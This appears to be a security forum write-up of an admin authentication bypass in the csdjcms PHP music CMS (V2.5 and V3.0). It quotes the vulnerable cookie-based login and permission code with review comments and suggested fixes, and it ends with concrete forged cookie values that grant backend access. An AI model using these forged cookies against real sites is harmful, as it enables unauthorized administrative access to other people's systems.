/*******************************************************/
/* csdjcms V2.5 and V3.0 admin authentication bypass via forged cookies (leads to backend access; the follow-on "getshell" step is not demonstrated in this write-up)
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
csdjcms (程氏音乐CMS) is a PHP music/singing-site CMS popular with YY voice-chat communities.
csdjcms V2.5 source (the equivalent V3.0 code follows at the end)
[php]// As usual, start from the front page (index.php)
// index.php entry: bounce to the installer while the site is not installed.
// NOTE(review): header("Location: ...") is not followed by exit, so the rest of this
// script (including the template rendering below) still runs for a client that
// ignores the redirect. S_IsInstall / S_Webmode are presumably defined by the
// included files — confirm in include/install.php and include/label.php.
include_once("include/install.php");
if(S_IsInstall==0){
header("Location:install/install.php");
}
include_once("include/label.php");
// S_Webmode==1 presumably means "render dynamically"; otherwise a pre-generated
// index.html is used when it exists.
if(S_Webmode==1 or !file_exists("index.html")){
// cache section: only render the template on a cache miss
$cache_id ='index_';
if(!($cache_opt->start($cache_id))){
echo GetTemp("index.html",0);
$cache_opt->end();
}
}
else{
// static file exists and static mode is on: hand off to it (again without exit)
header("Location:index.html");
}
// Next, the request-filtering helper from the include library
/**
 * Fetch a request parameter and apply the CMS's generic "safe" filter.
 *
 * @param string $key       parameter name
 * @param string $mode      'post', 'get', or anything else for POST-then-GET lookup
 * @param string $isfilter  non-empty => additionally run lib_replace_end_tag() on the value
 * @return string trimmed value, addslashes()-escaped unless magic_quotes_gpc already did it; '' when absent
 *
 * Security notes (review):
 * - addslashes() only backslash-escapes quotes, backslash and NUL. It is not a
 *   substitute for parameterised queries (it does nothing in numeric SQL contexts,
 *   is bypassable with multibyte charsets such as GBK) and gives no protection for
 *   HTML/JS output contexts.
 * - set_magic_quotes_runtime() was removed in PHP 7.0 and get_magic_quotes_gpc()
 *   in PHP 8.0, so this helper fatals on current PHP.
 */
function SafeRequest($key,$mode,$isfilter=''){
set_magic_quotes_runtime(0);
$magic= get_magic_quotes_gpc();
switch ($mode){
case 'post':
// nested ternary: present ? (already escaped by magic quotes ? trim : addslashes(trim)) : ''
$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';
break;
case 'get':
$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';
break;
default:
// any other mode: POST first, then fall back to GET when the POST value is ""
$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';
if($value==""){
$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';
}
break;
}
if($isfilter!=''){
// lib_replace_end_tag() is defined elsewhere in the CMS; its exact filtering is not visible here
$value=lib_replace_end_tag($value);
}
return $value;
}
// Submitted parameters are only passed through addslashes() — weak, but that is not where the real problem is.
// Reading further, the serious flaw is in the admin backend's login-state check.
081
// Head of an admin/ page: DB connection, helpers, version info, then the login-state check.
include "../include/conn.php";
include "../include/function.php";
include "admin_version.php";
include "admin_loginstate.php"; // the problem lives in this file
// Following into admin_loginstate.php:
// admin_loginstate.php: the backend "am I logged in" check.
// Every input below is a client-supplied cookie, so the whole check is forgeable:
//  - the MD5 covers only cookie values — no server secret, no session, no DB lookup;
//  - != is a loose comparison (also admits PHP's "0e…" numeric-string equivalence);
//    hash_equals() is the right primitive once the value is actually a keyed MAC;
//  - neither branch calls exit() after echoing the JavaScript redirect, so the rest
//    of the admin page keeps executing for a client that ignores the script.
// Fix: keep login state server-side (session), or sign a DB-verified record with a
// server secret (hash_hmac), compare with hash_equals(), and exit after each redirect.
if(empty($_COOKIE['S_AdminID'])){ // first: is an S_AdminID cookie present at all?
echo "<script>window.location='admin_login.php'</script>";
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
// this is the crux of the problem:
// if S_Login equals md5(S_AdminID . S_AdminUserName . S_AdminPassWord . S_Permission) — all four attacker-chosen — the check passes
echo "<script>window.parent.location='admin_login.php'</script>";
}
//后台权限判断
/**
 * Backend permission gate: die() unless $Column appears in the caller's permission list.
 *
 * @param mixed $Column  permission/column id the current action requires
 *
 * The permission list is read from the S_Permission cookie (client-controlled) and
 * split on ","; nothing is checked against the database. Because S_Permission is also
 * one of the inputs to the forgeable S_Login MD5 above, an attacker can claim any
 * permission set. Unlike the login check, this one does stop execution (die()).
 */
function SystemPer($Column){
if(empty($_COOKIE['S_Permission'])){
die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");
}else{
$SystemPermission=explode(",",$_COOKIE['S_Permission']); // permission check: split the cookie on "," into an array
$StateOK=0;
$ArrSystemPermission=count($SystemPermission);
for($k=0;$k<$ArrSystemPermission;$k++){
if($SystemPermission[$k]==$Column){ // loose == per element
$StateOK=1;
}
}
if($StateOK==0){
die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");
}
}
}
// Forged cookies (any values work as long as S_Login matches):
// S_Permission
// 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15   (presumably covers every $Column id that SystemPer() is called with)
// S_Login
// md5(S_AdminID . S_AdminUserName . S_AdminPassWord . S_Permission) — plain string concatenation in the order admin_loginstate.php uses, i.e. md5("111" . "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15") for the values below
// S_AdminUserName
// 1
// S_AdminPassWord
// 1
// S_AdminID
// 1
Backend authentication bypassed. Note that the MD5 does not even have to be right: the login check only echoes a JavaScript redirect without exit(), so execution continues regardless; the only thing that actually stops a page is SystemPer()'s die(), and it reads the same forgeable S_Permission cookie.[/php]
[php]
// The V3.0 release has the same check, with the cookies renamed to CS_*:
<?php
# Name: PHP版程氏音乐CMS管理系统 v3.0
# Author: 程氏<[url=mailto:web@chshcms.com]web@chshcms.com[/url]> [QQ:848769359]
# Homepage:[url=http://www.chshcms.cn/]http://www.chshcms.cn/[/url]
# Derive the admin directory name from the first path segment of the current script.
# NOTE(review): PHP_SELF can carry client-supplied PATH_INFO on some server setups; only
# segment [1] is used here, but verify it cannot be steered into the redirect URL below.
$CS_Path=$_SERVER['PHP_SELF'];
$CS_Pathall=explode("/",$CS_Path);
$CS_Admin=$CS_Pathall[1]."/";
# Same forgeable scheme as V2.5: CS_Login is md5() over four client-supplied cookies,
# with no server secret or session lookup, compared with loose !=, and neither branch
# exit()s after echoing the JavaScript redirect.
if(empty($_COOKIE['CS_AdminID'])){
echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php';</script>";
}
elseif($_COOKIE['CS_Login']!=md5($_COOKIE['CS_AdminID'].$_COOKIE['CS_AdminUserName'].$_COOKIE['CS_AdminPassWord'].$_COOKIE['CS_Quanx'])){
echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php'</script>";
}
//后台权限判断
function SystemPer($Column){
if(empty($_COOKIE['CS_Quanx'])){
die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");
exit();
}else{
$SystemPermission=explode(",",$_COOKIE['CS_Quanx']);
$StateOK=0;
$ArrSystemPermission=count($SystemPermission);
for($k=0;$k<$ArrSystemPermission;$k++){
if($SystemPermission[$k]==$Column){
$StateOK=1;
}
}
if($StateOK==0){
die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");
exit();
}
}[/php]